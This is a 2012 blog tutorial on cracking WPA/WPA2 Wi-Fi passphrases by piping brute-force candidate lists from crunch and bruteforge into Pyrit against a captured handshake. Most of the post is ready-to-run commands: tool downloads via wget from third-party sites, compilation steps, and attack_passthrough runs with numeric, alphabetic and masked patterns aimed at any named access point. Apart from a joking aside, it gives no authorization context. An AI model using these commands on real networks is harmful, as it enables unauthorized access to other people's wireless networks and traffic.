Ahmad Zainuddin: May 2012

So what are you going to do if your word list does not have the password?
Here is a how-to for cracking the WPA/WPA2 by brute forcing on the-fly.

First of all make sure you have your wpa handshake that you have have acquired from the AP by using the aircrack-ng suit.

We will be using Pyrit; http://code.google.com/p/pyrit/ for most of our work here.
Pyrit allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. It has CUDA and Opencl support, which we can use our more powerfull and cheaper GPU that are at most 100 times faster than the CPU

Lets install the needed packages first:

Code:

sudo apt-get install subversion python-dev libssl-dev zlib1g-dev

Now Lets Compile the latest SVN of Pyrit:

Code:

sudo svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
cd pyrit-read-only/pyrit
sudo python setup.py build
sudo python setup.py install

If you have an NVidia or ATi gpu make sure you compile the extension modules as well

A good thing to do first is strip all the unnessary packets that are in the .cap file
this would make the cracking much faster if the original .cap file was large

Code:

pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_dump_MyNetwork.cap strip

Now we compile a program called crunch:

Code:

wget http://www.darkc0de.com/c0de/c/crunch.txt -O crunch.c
gcc -c crunch.c
gcc -lm -o crunch crunch.o

crunch will do an stdout, so you can pipe results into pyrit

Now we are all ready to do some cracking, so make you sure you run these next examples from the place you compiled crunch!
Examples:

Code:

./crunch 8 8 0123456789 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This would generate every numeric combination using numbers 0-9 with a length of 8

Code:

./crunch 8 8 abcdefghijklmnopqrstuvwxyz | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above but using lower case letters

Lets say you know the password is admin and 3 unknown numbers, so here is what you do:

Code:

./crunch 8 8 0123456789 -t admin@@@ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

so only those @' will change with every number combo

Here is an example to use all from length 8 to 63 (lol)

Code:

./crunch 8 63 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

To bad crunch lacks the special characters (?!"#$%&'()*+,-./:;<=>?[\]^_`{|}~)
There is another alternative program called bruteforge: http://masterzorag.blogspot.com/
This program has more options, but bruteforge does NOT compute all chars combinations, it skips ahead when a condition is verified;
Get:

Code:

wget http://mz03.netfirms.com/py/bruteforge -O bruteforge.py

Examples:

Code:

python bruteforge.py bruteforge -c 2 -a 00000000 -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

This will generate a numeric string from len 8 to 9

Code:

python bruteforge.py bruteforge -a aaaaaaaa -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough

Same as above but using lower case letters

Notes: You can compute with all characters by using the -c 6 function with bruteforge, also you use the import_passwords instead of attack_passthrough for inserting generated strings into a database you have created with pyrit
example:

Code:

python bruteforge.py bruteforge -a aaaaaaaa | pyrit -i - import_passwords

Conclusion:
Well you can compute every possible combination, but it will just take time. This tutorial is just a demo, don't try this at home unless you have performance of a petaflop